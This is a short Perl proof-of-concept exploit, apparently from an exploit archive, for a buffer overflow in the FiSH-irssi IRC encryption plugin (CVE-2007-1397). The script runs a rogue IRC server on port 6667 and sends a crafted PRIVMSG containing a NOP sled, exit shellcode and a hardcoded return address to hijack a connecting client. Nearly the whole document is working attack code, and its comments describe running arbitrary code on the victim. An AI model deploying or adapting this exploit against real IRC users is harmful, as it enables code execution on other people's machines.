FiSH-irssi v0.99 Evil ircd Buffer Overflow (CVE-2007-1397) - [CVE: 2007-1397] 2011-04-17 20:39:59

# FiSH IRC encryption evil ircd PoC exploit.
# Abuses CVE-2007-1397
# Bad ircd, nasty bnc provider, nicknames over 100 char --> ruin.
# Runs arbitrary code which which in this case shuts down irssi.
# Tested on my own compiled FiSH with irssi/fedora/x86
# There are a lot more problems like this one, you should /unload fish
# Caleb James DeLisle - cjd

use Socket;

$retPtr = "\x60\xef\xff\xbf";

# Pirated from some guy called gunslinger_
$exit1code = "\x31\xc0\xb0\x01\x31\xdb\xcd\x80";

$code = "\x90" x 120 . $exit1code . $retPtr;

socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "Couldn't open socket";
bind(SOCKET, sockaddr_in(6667, inet_aton(""))) or die "Couldn't bind to port 6667";
listen(SOCKET,5) or die "Couldn't listen on port";

sleep 1;
select((select(CLIENT), $|=1)[0]);
print CLIENT ":-psyBNC!~cjd\@ef.net PRIVMSG luser : :($code\r\n";